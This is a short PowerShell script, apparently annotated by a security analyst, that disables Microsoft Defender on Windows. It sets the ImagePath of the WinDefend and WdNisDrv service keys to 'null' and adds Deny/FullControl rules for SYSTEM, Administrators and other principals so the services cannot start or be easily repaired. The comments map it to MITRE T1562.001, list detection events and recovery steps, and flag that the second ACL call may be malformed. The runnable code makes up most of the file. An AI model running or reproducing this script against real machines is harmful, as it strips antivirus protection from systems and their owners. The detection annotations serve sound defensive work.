break service.txt
#break the service so that it can never start
# Analyst summary: this section tampers with the WinDefend service key in two
# steps: it overwrites the ImagePath value, then adds Deny/FullControl ACEs
# for each listed principal. This is defense impairment (MITRE ATT&CK
# T1562.001).
# Detection: watch for writes to Services\WinDefend\ImagePath (Sysmon event 13,
# Security event 4657 when the key is audited) and DACL changes on the key
# (Security event 4670).
# NOTE(review): whether these writes succeed depends on the host's privileges
# and on Defender Tamper Protection; confirm the key's actual state on the host.
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"
# PowerShell variable names are case-insensitive, so $RegistryPath is the path
# set above. The bare word null is passed as the string "null", not $null, so
# an ImagePath of "null" on this key is a usable indicator.
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
# $key is assigned here but not referenced again in the visible script.
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
# One Deny/FullControl rule per principal. The ACL is re-read and written back
# on every iteration, so each pass is a separate permission change on the key.
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
# The Deny entries cover SYSTEM and Administrators as well, so restoring the
# key will presumably require resetting its DACL first. Verify during recovery.
Set-Acl -Path $registryPath -AclObject $acl
}
#break the service so that it can never start
# Analyst summary: same pattern as the WinDefend section, aimed at the WdNisDrv
# service key. The ImagePath value is overwritten with the string "null", then
# a Deny/FullControl rule is built and written back.
# Detection: the same signals apply on this key. Watch for a registry value set
# on Services\WdNisDrv\ImagePath and a permission change on the key.
$RegistryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisDrv"
# The ACL is captured before the ImagePath write and reused below.
$Acl = Get-Acl -Path $RegistryPath
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
# NOTE(review): unlike the per-principal loop in the WinDefend section, this
# call passes all the names as one comma-joined string and supplies six
# arguments. Do not assume the DACL on this key was changed; inspect the key's
# actual permissions during triage.
$Rule = New-Object System.Security.AccessControl.RegistryAccessRule(
"TrustedInstaller,ALL APPLICATION PACKAGES,CREATOR OWNER,SYSTEM,Administrators,Users",
"FullControl",
"Deny",
"None",
"None",
"None"
)
$Acl.AddAccessRule($Rule)
Set-Acl -Path $RegistryPath -AclObject $Acl